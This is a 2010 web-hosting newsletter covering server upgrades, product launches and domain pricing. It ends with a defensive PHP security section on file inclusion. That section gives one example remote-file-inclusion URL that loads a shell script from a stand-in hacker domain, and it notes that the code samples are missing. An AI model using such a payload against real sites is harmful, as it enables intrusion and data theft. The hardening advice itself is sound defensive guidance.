Autumn 2010

Greetings and welcome to the Autumn 2010 edition of Nexology. This newsletter is a round-up of things happening at HostNexus and will probably go out 4 times a year (next edition will be Winter 2010). It's been busy as usual at HN with a lot happening behind the scenes and lots more to come!

Hoping everyone north of the equator had a great summer! We wish our Antipodean clients an awesome summer too!

A Brief Round-Up

Plesk 9.5 for Windows - We have started upgrading our fleet of windows servers to Plesk 9.5. Most linux shared/reseller servers already have this but Plesk upgrades on windows servers aren't as easy. The first one on Baryon went well, but the Neutron upgrade took longer than expected and had various issues. We will take what we've learned so far and continue on. If any Managed Server client would like the upgrade please schedule it with our support team.

ColdFusion 9 - So far we've only deployed CF 9 on CF Linux server Atom. The CF 9 upgrade on Linux is possible but not without issues. We have yet to figure out how to migrate MySQL 3 type DSNs from CF 8 to CF 9. On Windows the problems are larger as the upgrade wipes any DSNs created from Plesk. However, I'm told that CF 9 support is coming in Plesk 9.5.3 so all the more reason to press on with those Plesk 9 upgrades.

MailEnable Pro - MailEnable Pro was installed on Boson with its IMAP support. Baryon is scheduled for this upgrade in a few weeks so clients on that server hold tight for that.

New Root Exploit - A nasty root exploit was discovered earlier this month that caused huge ripples throughout the Linux community. A fix was offered which we implemented right away. It caused some issues with FrontPage on a few servers but that should be fixed now. If anyone has non-functioning FrontPage sites just reinstall the extensions by updating the FP password in Plesk. Don't hesitate to contact Support if you need help. A new kernel fixing the issue was released and we installed on all servers (including managed dedicated servers).

	NEW: cPanel Now Available! If you've looked at our home page recently you'll see we are now providing Shared and Reseller Hosting on the popular cPanel platform. On cPanel we have the Fantastico and Softaculous one-click installers plus the popular RvSkin and free RvSiteBuilder for everyone. We used to offer cPanel on another brand called ResellerNexus and we have always offered it on VPS and dedicated hosting but this is a first for the HostNexus brand and we are very excited about it. Details are up on this page
	NEW: Updated Dedicated Server Line After a great year we've phased out the old Core2Duo/Core2Quad line. We are now offering the newer Core i3 and Core i7 servers plus a new line of powerful Dual Processor Xeon servers. Check out the Dedicated Server page if you want to take your site to the next lext with a fully managed dedicated server of your own. We are now up to 6 cores per proc - go Intel!
	HostNexus Now On Facebookl We now have a FanPage on Facebook. Please check it out, leave comments on our wall, post reviews and tell your friends. We hope you "like" it! .
	Blog Post: How To Bulk Unfollow On Twitter in Minutes Have you ever wanted to clean out your Twitter account? Ever feel the need to exterminate all the auto-follow spammers following 97,000 people? Maybe you have, and then maybe you found that Twitter does not make it easy for you to bulk unfollow hundreds, or indeed thousands of people. This was the case with me and I went on a crusade to solve the problem. And solve it I did. Read the blog post for the full story and a few laughs.
	Introducing the new NexusDomains We have given NexusDomains a long overdue facelift. The new site you see is Enom's new Instant Reseller product that is phasing out the old PDQ system. Unfortunately it is a lot more expensive than PDQ at $249.95/yr but I think you'll agree it is leagues ahead of PDQ in layout, design and functionality. The customisable options are very nice indeed. So if you want a completely automated domain business and you can absorb the cost, I highly recommend upgrading to Instant Reseller. Visit NexusDomains today.
	Price Increase From Verisign (yet again) It's that time of year again and Verisign has increased prices for all .com domains by $0.50. This is in fact the third such increase from Verisign as they raise it each year but until now we've always absorbed the costs, wanting to give our clients the best possible pricing on .com domains. With this year's increase we do have to do something though so we have passed this increase along to our Domain Resellers. Retail customers will still be able to register .com domains at NexusDomains for the usual $12.95/yr but the base price for Domain Resellers has risen from $8.95 to $9.45. Please see the announcement on our forum.

PHP Security and YOU - Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

External:

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

And now onto using include() for calling external files:

The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP's readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

I emailed about this issue in a recent NewsFlash and the blog post has been up for quite some time. We will be setting allow_url_include to off on all servers from August 1st so please check your code if you use includes and make the easy changes.

Tha's All Folks!

See you all next time.

Navigate Our Site